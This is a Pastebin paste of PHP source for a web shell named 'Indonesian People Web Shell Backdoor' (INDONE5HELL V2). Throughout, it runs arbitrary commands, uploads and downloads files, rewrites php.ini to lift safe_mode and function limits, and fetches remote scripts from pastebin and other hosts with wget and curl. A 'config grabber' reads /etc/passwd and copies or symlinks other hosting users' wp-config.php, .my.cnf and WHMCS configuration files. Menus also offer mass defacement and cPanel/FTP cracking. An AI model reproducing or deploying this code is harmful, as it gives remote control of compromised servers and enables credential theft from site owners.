AZZATSSINS_CYBERSERK

INDONE5HELL V2

Feb 12th, 2017
403
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 141.17 KB | None | 0 0
  1. <?php
  2. session_start();
  3. error_reporting(0);
  4. set_time_limit(0);
  5. @set_magic_quotes_runtime(0);
  6. @clearstatcache();
  7. @ini_set('error_log',NULL);
  8. @ini_set('log_errors',0);
  9. @ini_set('max_execution_time',0);
  10. @ini_set('output_buffering',0);
  11. @ini_set('display_errors', 0);
  12. $phi = fopen("php.ini","w+");
  13. fwrite($phi,"safe_mode = Off
  14. disable_functions = NONE
  15. safe_mode_gid = OFF
  16. open_basedir = OFF ");
  17. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  18.     @ob_clean();
  19.     $file = $_GET['file'];
  20.     header('Content-Description: File Transfer');
  21.     header('Content-Type: application/octet-stream');
  22.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  23.     header('Expires: 0');
  24.     header('Cache-Control: must-revalidate');
  25.     header('Pragma: public');
  26.     header('Content-Length: ' . filesize($file));
  27.     readfile($file);
  28.     exit;
  29. }
  30. ?>
  31. <html>
  32. <head>
  33. <title>Indonesian People Web Shell Backdoor</title>
  34. <link href='http://azzat.wap.mu/favicon.ico' rel='shortcut icon' alt='icon'>
  35. <meta name='author' content='AZZATSSINS'>
  36. <meta charset="UTF-8">
  37. <style type='text/css'>
  38. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  39. html {
  40.     background: #000000;
  41.     color: #ffffff;
  42.     font-family: 'Ubuntu';
  43.     font-size: 13px;
  44.     width: 100%;
  45. }
  46. li {
  47.     display: inline;
  48.     margin: 5px;
  49.     padding: 5px;
  50. }
  51. table, th, td {
  52.     border-collapse:collapse;
  53.     font-family: Tahoma, Geneva, sans-serif;
  54.     background: transparent;
  55.     font-family: 'Ubuntu';
  56.     font-size: 13px;
  57. }
  58. .table_home, .th_home, .td_home {
  59.     border: 1px solid #ffffff;
  60. }
  61. th {
  62.     padding: 10px;
  63. }
  64. a {
  65.     color: #ffffff;
  66.     text-decoration: none;
  67. }
  68. a:hover {
  69.     color: gold;
  70.     text-decoration: underline;
  71. }
  72. b {
  73.     color: gold;
  74. }
  75. input[type=text], input[type=password],input[type=submit] {
  76.     background: transparent;
  77.     color: #ffffff;
  78.     border: 1px solid #ffffff;
  79.     margin: 5px auto;
  80.     padding-left: 5px;
  81.     font-family: 'Ubuntu';
  82.     font-size: 13px;
  83. }
  84. textarea {
  85.     border: 1px solid #ffffff;
  86.     width: 100%;
  87.     height: 400px;
  88.     padding-left: 5px;
  89.     margin: 10px auto;
  90.     resize: none;
  91.     background: transparent;
  92.     color: #ffffff;
  93.     font-family: 'Ubuntu';
  94.     font-size: 13px;
  95. }
  96. select {
  97.     width: 152px;
  98.     background: #000000;
  99.     color: lime;
  100.     border: 1px solid #ffffff;
  101.     margin: 5px auto;
  102.     padding-left: 5px;
  103.     font-family: 'Ubuntu';
  104.     font-size: 13px;
  105. }
  106. option:hover {
  107.     background: lime;
  108.     color: #000000;
  109. }
  110. </style>
  111. </head>
  112. <?php
  113. function w($dir,$perm) {
  114.     if(!is_writable($dir)) {
  115.         return "<font color=red>".$perm."</font>";
  116.     } else {
  117.         return "<font color=lime>".$perm."</font>";
  118.     }
  119. }
  120. function r($dir,$perm) {
  121.     if(!is_readable($dir)) {
  122.         return "<font color=red>".$perm."</font>";
  123.     } else {
  124.         return "<font color=lime>".$perm."</font>";
  125.     }
  126. }
  127. function exe($cmd) {
  128.     if(function_exists('system')) {        
  129.         @ob_start();       
  130.         @system($cmd);     
  131.         $buff = @ob_get_contents();        
  132.         @ob_end_clean();       
  133.         return $buff;  
  134.     } elseif(function_exists('exec')) {        
  135.         @exec($cmd,$results);      
  136.         $buff = "";        
  137.         foreach($results as $result) {         
  138.             $buff .= $result;      
  139.         } return $buff;    
  140.     } elseif(function_exists('passthru')) {        
  141.         @ob_start();       
  142.         @passthru($cmd);       
  143.         $buff = @ob_get_contents();        
  144.         @ob_end_clean();       
  145.         return $buff;  
  146.     } elseif(function_exists('shell_exec')) {      
  147.         $buff = @shell_exec($cmd);     
  148.         return $buff;  
  149.     }
  150. }
  151. function perms($file){
  152.     $perms = fileperms($file);
  153.     if (($perms & 0xC000) == 0xC000) {
  154.     // Socket
  155.     $info = 's';
  156.     } elseif (($perms & 0xA000) == 0xA000) {
  157.     // Symbolic Link
  158.     $info = 'l';
  159.     } elseif (($perms & 0x8000) == 0x8000) {
  160.     // Regular
  161.     $info = '-';
  162.     } elseif (($perms & 0x6000) == 0x6000) {
  163.     // Block special
  164.     $info = 'b';
  165.     } elseif (($perms & 0x4000) == 0x4000) {
  166.     // Directory
  167.     $info = 'd';
  168.     } elseif (($perms & 0x2000) == 0x2000) {
  169.     // Character special
  170.     $info = 'c';
  171.     } elseif (($perms & 0x1000) == 0x1000) {
  172.     // FIFO pipe
  173.     $info = 'p';
  174.     } else {
  175.     // Unknown
  176.     $info = 'u';
  177.     }
  178.         // Owner
  179.     $info .= (($perms & 0x0100) ? 'r' : '-');
  180.     $info .= (($perms & 0x0080) ? 'w' : '-');
  181.     $info .= (($perms & 0x0040) ?
  182.     (($perms & 0x0800) ? 's' : 'x' ) :
  183.     (($perms & 0x0800) ? 'S' : '-'));
  184.     // Group
  185.     $info .= (($perms & 0x0020) ? 'r' : '-');
  186.     $info .= (($perms & 0x0010) ? 'w' : '-');
  187.     $info .= (($perms & 0x0008) ?
  188.     (($perms & 0x0400) ? 's' : 'x' ) :
  189.     (($perms & 0x0400) ? 'S' : '-'));
  190.     // World
  191.     $info .= (($perms & 0x0004) ? 'r' : '-');
  192.     $info .= (($perms & 0x0002) ? 'w' : '-');
  193.     $info .= (($perms & 0x0001) ?
  194.     (($perms & 0x0200) ? 't' : 'x' ) :
  195.     (($perms & 0x0200) ? 'T' : '-'));
  196.     return $info;
  197. }
  198. function hdd($s) {
  199.     if($s >= 1073741824)
  200.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  201.     elseif($s >= 1048576)
  202.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  203.     elseif($s >= 1024)
  204.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  205.     else
  206.     return $s .' B';
  207. }
  208. function ambilKata($param, $kata1, $kata2){
  209.     if(strpos($param, $kata1) === FALSE) return FALSE;
  210.     if(strpos($param, $kata2) === FALSE) return FALSE;
  211.     $start = strpos($param, $kata1) + strlen($kata1);
  212.     $end = strpos($param, $kata2, $start);
  213.     $return = substr($param, $start, $end - $start);
  214.     return $return;
  215. }
  216. function getsource($url) {
  217.     $curl = curl_init($url);
  218.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  219.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  220.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  221.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  222.     $content = curl_exec($curl);
  223.             curl_close($curl);
  224.     return $content;
  225. }
  226.  
  227. if(get_magic_quotes_gpc()) {
  228.     function azzatssinsx($array) {
  229.         return is_array($array) ? array_map('azzatssinsx', $array) : stripslashes($array);
  230.     }
  231.     $_POST = azzatssinsx($_POST);
  232.     $_COOKIE = azzatssinsx($_COOKIE);
  233. }
  234.  
  235. if(isset($_GET['dir'])) {
  236.     $dir = $_GET['dir'];
  237.     chdir($dir);
  238. } else {
  239.     $dir = getcwd();
  240. }
  241. $kernel = php_uname();
  242. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  243. $dir = str_replace("\\","/",$dir);
  244. $scdir = explode("/", $dir);
  245. $ds = @ini_get("disable_functions");
  246. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  247. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  248. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  249. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  250. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  251. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  252. if(!function_exists('posix_getegid')) {
  253.     $user = @get_current_user();
  254.     $uid = @getmyuid();
  255.     $gid = @getmygid();
  256.     $group = "?";
  257. } else {
  258.     $uid = @posix_getpwuid(posix_geteuid());
  259.     $gid = @posix_getgrgid(posix_getegid());
  260.     $user = $uid['name'];
  261.     $uid = $uid['uid'];
  262.     $group = $gid['name'];
  263.     $gid = $gid['gid'];
  264. }
  265.  
  266. if($_GET['server'] == 'info') {
  267. echo "System: <font color=lime>".$kernel."</font><br>";
  268. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  269. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  270. echo"Config File: "; if(is_readable("/etc/named.conf")){
  271.  
  272. echo '[<font color=lime>/etc/named.conf</font>] ';
  273.  
  274. }else{
  275.  
  276. echo '[<font color=red>/etc/named.conf</font>] ';
  277.  
  278. }
  279.  
  280. if(is_readable("/etc/passwd")){
  281.  
  282. echo '[<font color=lime>/etc/passwd</font>] ';
  283.  
  284. }else{
  285.  
  286. echo '[<font color=red>/etc/passwd</font>] ';
  287.  
  288. }
  289.  
  290. if(is_readable("/etc/valiases")){
  291.  
  292. echo '[<font color=lime>/etc/valiases</font>] ';
  293. }else{
  294.  
  295. echo '[<font color=red>/etc/valiases</font>] ';
  296.  
  297. }
  298.  
  299. if(is_readable("/var/named")){
  300.  
  301. echo '[<font color=lime>/var/named</font>] ';
  302. }else{
  303.  
  304. echo '[<font color=red>/var/named</font>] ';
  305.  
  306. }
  307. echo "<br>Disable Functions: $show_ds<br>";
  308. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  309. }
  310. echo "Current DIR: ";
  311. foreach($scdir as $c_dir => $cdir) {   
  312.     echo "<a href='?dir=";
  313.     for($i = 0; $i <= $c_dir; $i++) {
  314.         echo $scdir[$i];
  315.         if($i != $c_dir) {
  316.         echo "/";
  317.         }
  318.     }
  319.     echo "'>$cdir</a>/";
  320. }
  321. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
  322.     echo "<center></fieldset>";
  323.     if($_POST['upload']) {
  324.         if($_POST['tipe_upload'] == 'biasa') {
  325.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  326.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  327.             } else {
  328.                 $act = "<font color=red>failed to upload file</font>";
  329.             }
  330.         } else {
  331.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  332.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  333.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  334.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  335.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  336.                 } else {
  337.                     $act = "<font color=red>failed to upload file</font>";
  338.                 }
  339.             } else {
  340.                 $act = "<font color=red>failed to upload file</font>";
  341.             }
  342.         }
  343.     }
  344.     echo "<form method='post' enctype='multipart/form-data'>
  345.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  346.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  347.     <input type='file' name='ix_file'>
  348.     <input type='submit' value='upload' name='upload'>
  349.     </form>";
  350.     echo $act;
  351. echo "</fieldset></center><br>";
  352. echo "<center>";
  353. echo "<fieldset><ul><b>";
  354. echo "<li>[ <a href='?'>HOME</a> ]</li>";
  355. echo "<li>[ <a href='?server=info'>SERVER INFO</a> ]</li>";
  356. echo "<li>[ <a href='?dir=$dir&do=whmcs'>WHMCS DECODER</a> ]</li>";
  357. echo "<li>[ <a href='?whmcs=killer'>WHMCS KILLER</a> ]</li>";
  358. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>AUTO MASS</a> ]</li>";
  359. echo "<li>[ <a href='?config=grabber'>CONFIGS</a> ]</li>";
  360. echo "<li>[ <a href='?dir=$dir&do=jumping'>JUMPING</a> ]</li>";
  361. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPFTP CRACK</a> ]</li>";
  362. echo "<li>[ <a href='?dir=$dir&do=mirror'>MIRROR</a> ]</li>";
  363. echo "<li>[ <a href='?dir=$dir&do=cgi'>PERL5HELL</a> ]</li>";
  364. echo "<li>[ <a href='?mysql=connect'>MYSQL</a> ]</li><br>";
  365. echo "<li>[ <a href='?symbolic=link'>SYMLINK</a> ]</li>";
  366. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>CHANGE USER</a> ]</li>";
  367. echo "<li>[ <a style='color: red;' href='?kill=self'>KILLSELF</a> ]</li>";
  368. echo "</b></ul></fieldset>";
  369. echo "</center>";
  370. echo "<br><fieldset>";
  371.     echo "<form method='post'>
  372. <font style='text-decoration: underline;'>Command : </font>
  373. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='azx' value='>>'>
  374.     </form> ";
  375.     if(isset($_POST['azx']))
  376. {
  377.  
  378. echo'<br><div style="background:#6d6d6d;margin:0px;padding:1px;text-align:left;color:lime;"><pre>';
  379. $cmd = $_POST['cmd'];
  380. if($cmd == "")
  381. {
  382.  
  383. echo "Please Insert Command!";
  384.  }
  385.  
  386. elseif(isset($cmd))
  387.  {
  388.  $output = exe($cmd);
  389.  echo $output; }
  390. echo'</pre></div><br><br>';
  391. }
  392. echo "</fieldset><br>";
  393. if($_GET['whmcs'] == 'killer') {
  394. echo'<form method="post">
  395. <center>
  396. <br><u>Input WHMCS configuration.php</u><br><textarea style="color:red;background-color:#000000" cols="60" name="azztssns" rows="20"></textarea><br><input style="color:red;background-color:#000000" name="conf" size="10"
  397. value="Fuck it!!!" type="submit">
  398. <br/><br/></form></center>';
  399. if ($_POST['conf']) {
  400. $configuration = $_POST['azztssns'];
  401. file_put_contents("configuration.php",$configuration,FILE_APPEND);
  402. $scr = file_get_contents("http://pastebin.com/raw/31kP3Dp8");
  403. $fel = fopen("wk.php", "w");
  404. fwrite($fel, $scr);
  405. system('wget -O wk.php http://pastebin.com/raw/31kP3Dp8');
  406. echo'<meta http-equiv="Refresh" content= "0; url=wk.php">';
  407. }
  408. }
  409.  
  410. if($_GET['do'] == 'cgi') {
  411.     $cgi_dir = mkdir('azx', 0755);
  412.     $file_cgi = "azx/cgi.pl";
  413.     $isi_htcgi = "AddHandler cgi-script .pl";
  414.     $htcgi = fopen(".htaccess", "w");
  415. $cgi_script = file_get_contents("http:/x-x-x.yn.lt/pl.css");
  416.     $cgi = fopen($file_cgi, "w");
  417.     fwrite($cgi, $cgi_script);
  418.     fwrite($htcgi, $isi_htcgi);
  419.     chmod($file_cgi, 0755);
  420. system('wget -O azx/cgi.pl www.x-x-x.yn.lt/pl.css');system('chmod 0755 cgi.pl');
  421. echo'<meta http-equiv="Refresh" content= "0; url=azx/cgi.pl">';
  422.  }
  423. if($_GET['mysql']=="connect"){
  424.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  425.     function adminer($url, $isi) {
  426.         $fp = fopen($isi, "w");
  427.         $ch = curl_init();
  428.               curl_setopt($ch, CURLOPT_URL, $url);
  429.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  430.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  431.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  432.               curl_setopt($ch, CURLOPT_FILE, $fp);
  433.         return curl_exec($ch);
  434.               curl_close($ch);
  435.         fclose($fp);
  436.         ob_flush();
  437.         flush();
  438.     }
  439.     if(file_exists('mysql.php')) {
  440.         echo "<center><font color=lime><a href='mysql.php' target='_blank'>KLICK DI SINI</a></font></center>";
  441.     } else {
  442.         if(adminer("http://pastebin.com/raw/hN2nDPuH","mysql.php")) {
  443.             echo "<center><font color=lime><a href='mysql.php' target='_blank'>-> KLICK DI SINI <-</a></font></center>";
  444.         } else {
  445.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  446.         }
  447.     }
  448. }
  449. if($_GET['config']=="grabber"){
  450. @error_reporting(0);
  451. @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
  452. echo'<center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>AZZATSSINS CYBERSERKERS</a></b></i></div><br>
  453. <form method="post">
  454. <center>
  455. <textarea style="color:red;background-color:#000000" cols="60" name="passwd" rows="20">';
  456. $uSr=file("/etc/passwd");
  457. foreach($uSr as $usrr)
  458. {
  459. $str=explode(":",$usrr);
  460. echo $str[0]."\n";
  461. }
  462. $azzztttsssinnsss = scandir("/var/mail");
  463.     foreach($azzztttsssinnsss as $azxx) {
  464.     echo $azxx."\n";
  465.     }
  466.     $azzztttsssinnsssx = scandir("/var/www/vhosts");
  467.     foreach($azzztttsssinnsssx as $azxxx) {
  468.     echo $azxxx."\n";
  469.     }
  470.     $azzztttsssinnsssxx = scandir("/var/www");
  471.     foreach($azzztttsssinnsssxx as $azxxxx) {
  472.     echo $azxxxx."\n";
  473.     }
  474.     $azzztttsssinnsssxxx = scandir("/home");
  475.     foreach($azzztttsssinnsssxxx as $azxxxxx) {
  476.     echo $azxxxxx."\n";
  477.     }
  478.  
  479. echo'</textarea><br>
  480. Home :
  481. <select name="home">
  482. <option title="home" value="home">home</option>
  483. <option title="home1" value="home1">home1</option>
  484. <option title="home2" value="home2">home2</option>
  485. <option title="home3" value="home3">home3</option>
  486. <option title="home4" value="home4">home4</option>
  487. <option title="home5" value="home5">home5</option>
  488. <option title="home6" value="home6">home6</option>
  489. <option title="home7" value="home7">home7</option>
  490. <option title="home8" value="home8">home8</option>
  491. <option title="home9" value="home9">home9</option>
  492. <option title="home10" value="home10">home10</option>
  493. </select><br>
  494. .htaccess :
  495. <select name="azztssns">
  496. <option title="biasa" value="Options Indexes FollowSymLinks
  497. DirectoryIndex azzatssins.cyberserkers
  498. AddType txt .php
  499. AddHandler txt .php">Apache 1</option>
  500. <option title="Apache" value="Options all
  501. Options +Indexes
  502. Options +FollowSymLinks
  503. DirectoryIndex azzatssins.cyberserkers
  504. AddType text/plain .php
  505. AddHandler server-parsed .php
  506. AddType text/plain .html
  507. AddHandler txt .html
  508. Require None
  509. Satisfy Any">Apache 2</option>
  510. <option title="Litespeed" value="
  511. Options +FollowSymLinks
  512. DirectoryIndex azzatssins.cyberserkers
  513. RemoveHandler .php
  514. AddType application/octet-stream .php ">Litespeed</option>
  515. </select>
  516. <input style="color:red;background-color:#000000" name="conf" size="10"
  517. value="Fuck it!!!" type="submit">
  518. <br/><br/></form>';
  519. print(`{$_REQUEST[_]}`);
  520. if ($_POST['conf']) {
  521. $home = $_POST['home'];
  522. $xAzzatssinSx = $home;
  523. @mkdir($xAzzatssinSx, 0777);
  524. @chdir($xAzzatssinSx);
  525. $htaccess = $_POST['azztssns'];
  526. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
  527. $passwd=explode("\n",$_POST["passwd"]);
  528. foreach($passwd as $pwd){ $user=trim($pwd);
  529. symlink('/','000~42247551N5~000');
  530. copy('/'.$home.'/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  531. symlink('/'.$home.'/'.$user.'/.my.cnf',$user.' <~ CPANEL');
  532. copy('/'.$home.'/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  533. symlink('/'.$home.'/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
  534. copy('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  535. symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
  536. symlink('/'.$home.'/'.$user.'/public_html/.accesshash',$user.' <~ WHMCS.txt');
  537. copy('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  538. copy('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  539. copy('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  540. copy('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  541. copy('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  542. copy('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  543. copy('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  544. copy('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  545. copy('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  546. copy('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  547. copy('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  548. copy('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  549. copy('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  550. copy('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  551. copy('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  552. copy('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  553. copy('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  554. copy('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  555. copy('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  556. copy('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  557. copy('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  558. copy('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  559. copy('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  560. copy('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  561. copy('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  562. copy('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  563. copy('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  564. copy('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
  565. copy('/'.$home.'/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
  566. copy('/'.$home.'/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt');
  567. copy('/'.$home.'/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
  568. copy('/'.$home.'/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
  569. copy('/'.$home.'/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
  570. copy('/'.$home.'/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
  571. copy('/'.$home.'/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
  572. copy('/'.$home.'/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
  573. copy('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
  574. copy('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
  575. copy('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
  576. copy('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
  577. copy('/'.$home.'/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
  578. copy('/'.$home.'/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
  579. copy('/'.$home.'/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
  580. copy('/'.$home.'/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
  581. copy('/'.$home.'/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
  582. copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
  583. copy('/'.$home.'/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
  584. copy('/'.$home.'/'.$user.'/public_html/purchase/configuration.php',$user.' <~ WHMCS.txt');
  585.  
  586. copy('/'.$home.'/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
  587. copy('/'.$home.'/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
  588. copy('/'.$home.'/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
  589. copy('/'.$home.'/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
  590. copy('/'.$home.'/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  591. copy('/'.$home.'/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  592. copy('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  593. copy('/'.$home.'/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  594. copy('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  595. copy('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  596. copy('/'.$home.'/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  597. copy('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  598. copy('/'.$home.'/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  599. copy('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  600. symlink('/'.$home.'/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
  601. symlink('/'.$home.'/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
  602. symlink('/'.$home.'/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
  603. symlink('/'.$home.'/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
  604. symlink('/'.$home.'/'.$user.'/public_html/buy/configuration.php',$user.' <~ WHMCS.txt');
  605. symlink('/'.$home.'/'.$user.'/public_html/checkout/configuration.php',$user.' <~ WHMCS.txt');
  606. symlink('/'.$home.'/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
  607. symlink('/'.$home.'/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
  608. symlink('/'.$home.'/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
  609. symlink('/'.$home.'/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
  610. symlink('/'.$home.'/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
  611. symlink('/'.$home.'/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
  612. symlink('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
  613. symlink('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
  614. symlink('/'.$home.'/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
  615. symlink('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
  616. symlink('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
  617. symlink('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
  618. symlink('/'.$home.'/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
  619. symlink('/'.$home.'/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
  620. symlink('/'.$home.'/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
  621. symlink('/'.$home.'/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
  622. symlink('/'.$home.'/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
  623. symlink('/'.$home.'/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
  624. symlink('/'.$home.'/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
  625. symlink('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
  626. symlink('/'.$home.'/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
  627. symlink('/'.$home.'/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
